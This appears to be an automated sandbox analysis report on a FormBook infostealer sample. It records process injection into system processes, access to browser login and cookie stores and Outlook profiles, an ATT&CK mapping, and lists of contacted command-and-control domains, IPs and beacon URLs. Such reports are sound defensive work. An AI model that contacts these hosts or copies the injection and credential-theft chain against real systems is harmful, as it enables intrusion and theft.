Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 7972

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\150-425-2024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 52B008

Jump to behavior

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C18C93 LogonUserW,

0_2_00C18C93

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BC3B4C

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00BC4A35

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C24EC9 mouse_event,

0_2_00C24EC9

Source: C:\Users\user\Desktop\150-425-2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\150-425-2024.exe

0_2_00C181F7

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C24C03

Source: 150-425-2024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: 150-425-2024.exe, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914597799.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505927942.0000000001231000.00000002.00000001.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656171114.00000000014F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BE886B cpuid

0_2_00BE886B

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00BF50D7

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C02230 GetUserNameW,

0_2_00C02230

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00BF418A

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BC4AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 150-425-2024.exe	Binary or memory string: WIN_81
Source: 150-425-2024.exe	Binary or memory string: WIN_XP
Source: 150-425-2024.exe	Binary or memory string: WIN_XPe
Source: 150-425-2024.exe	Binary or memory string: WIN_VISTA
Source: 150-425-2024.exe	Binary or memory string: WIN_7
Source: 150-425-2024.exe	Binary or memory string: WIN_8
Source: 150-425-2024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00C36596
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C36A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	51 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
150-425-2024.exe	47%	ReversingLabs	Win32.Worm.DorkBot
150-425-2024.exe	29%	Virustotal		Browse
150-425-2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
elettrosistemista.zip	4%	Virustotal	Browse
empowermedeco.com	11%	Virustotal	Browse
www.660danm.top	11%	Virustotal	Browse
www.3xfootball.com	1%	Virustotal	Browse
www.antonio-vivaldi.mobi	11%	Virustotal	Browse
www.joyesi.xyz	2%	Virustotal	Browse
www.goldenjade-travel.com	3%	Virustotal	Browse
www.rssnewscast.com	10%	Virustotal	Browse
www.liangyuen528.com	2%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
www.techchains.info	10%	Virustotal	Browse
www.elettrosistemista.zip	5%	Virustotal	Browse
www.donnavariedades.com	5%	Virustotal	Browse
www.empowermedeco.com	5%	Virustotal	Browse
www.magmadokum.com	10%	Virustotal	Browse
www.kasegitai.tokyo	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/?OVFPBtpp=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOK51Mgi6ytQL9yeTtlbiBUAmNTsA==&-LXd8=qhq0rNepS	0%	Avira URL Cloud	safe
https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/	100%	Avira URL Cloud	phishing
http://www.magmadokum.com/fo8o/	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/	100%	Avira URL Cloud	malware
http://www.kasegitai.tokyo/fo8o/	0%	Avira URL Cloud	safe
http://www.antonio-vivaldi.mobi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	4%	Virustotal		Browse
http://www.empowermedeco.com/fo8o/	8%	Virustotal		Browse
http://www.rssnewscast.com/fo8o/	8%	Virustotal		Browse
http://www.magmadokum.com/fo8o/	7%	Virustotal		Browse
https://login.live	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	malware
http://www.660danm.top/fo8o/	10%	Virustotal		Browse
http://www.goldenjade-travel.com/fo8o/	3%	Virustotal		Browse
http://www.donnavariedades.com/fo8o/?OVFPBtpp=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&-LXd8=qhq0rNepS	0%	Avira URL Cloud	safe
http://www.antonio-vivaldi.mobi/fo8o/	100%	Avira URL Cloud	malware
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
http://www.3xfootball.com/fo8o/?OVFPBtpp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&-LXd8=qhq0rNepS	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	100%	Avira URL Cloud	malware
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Virustotal		Browse
http://www.antonio-vivaldi.mobi/fo8o/	8%	Virustotal		Browse
http://www.empowermedeco.com	100%	Avira URL Cloud	malware
http://www.donnavariedades.com/fo8o/	0%	Avira URL Cloud	safe
https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR	100%	Avira URL Cloud	malware
https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4ds	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	4%	Virustotal		Browse
https://login.live	0%	Virustotal		Browse
http://www.elettrosistemista.zip/fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	malware
http://www.660danm.top/fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	phishing
http://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS	100%	Avira URL Cloud	malware
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
http://www.empowermedeco.com	5%	Virustotal		Browse
http://www.donnavariedades.com/fo8o/	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elettrosistemista.zip	195.110.124.133	true	false	4%, Virustotal, Browse	unknown
www.660danm.top	34.111.148.214	true	false	11%, Virustotal, Browse	unknown
empowermedeco.com	217.196.55.202	true	false	11%, Virustotal, Browse	unknown
www.3xfootball.com	154.215.72.110	true	false	1%, Virustotal, Browse	unknown
www.antonio-vivaldi.mobi	46.30.213.191	true	false	11%, Virustotal, Browse	unknown
www.joyesi.xyz	185.237.107.49	true	true	2%, Virustotal, Browse	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	3%, Virustotal, Browse	unknown
www.rssnewscast.com	91.195.240.94	true	false	10%, Virustotal, Browse	unknown
www.techchains.info	66.29.149.46	true	false	10%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	false	0%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
www.kasegitai.tokyo	202.172.28.202	true	false	0%, Virustotal, Browse	unknown
www.magmadokum.com	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.donnavariedades.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.liangyuen528.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.empowermedeco.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.elettrosistemista.zip	unknown	unknown	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.kasegitai.tokyo/fo8o/?OVFPBtpp=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOK51Mgi6ytQL9yeTtlbiBUAmNTsA==&-LXd8=qhq0rNepS	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS	false	Avira URL Cloud: safe	unknown
http://www.660danm.top/fo8o/	false	10%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.magmadokum.com/fo8o/	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.kasegitai.tokyo/fo8o/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS	false	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS	false	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/?OVFPBtpp=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&-LXd8=qhq0rNepS	false	Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.3xfootball.com/fo8o/?OVFPBtpp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&-LXd8=qhq0rNepS	false	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS	false	Avira URL Cloud: malware	unknown
http://www.660danm.top/fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS	false	Avira URL Cloud: phishing	unknown
